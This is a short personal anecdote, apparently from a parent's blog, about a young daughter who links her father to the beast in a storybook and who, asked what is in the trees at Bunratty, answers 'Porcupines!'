Now, every time the beast appears in the story, either reading the book or listening to the accompanying CD, she enthusiastically points out to me that "This is your bit, daddy!"
While trying to elicit from her a reason as to why birds were in the trees in Bunratty, the following conversation emerged:
Me: (listening to the bird sounds in the trees) "Why do you think the birds are up in the trees? What do you think birds have that are in trees? ... Can you see anything else in the trees?"
Róisín: "Porcupines!"
(I was pretty much silenced by this remark and humbly pointed out the nests that I could see without really dealing with the issues of potential spiny ground-dwelling creatures having taken to the tree-tops...)
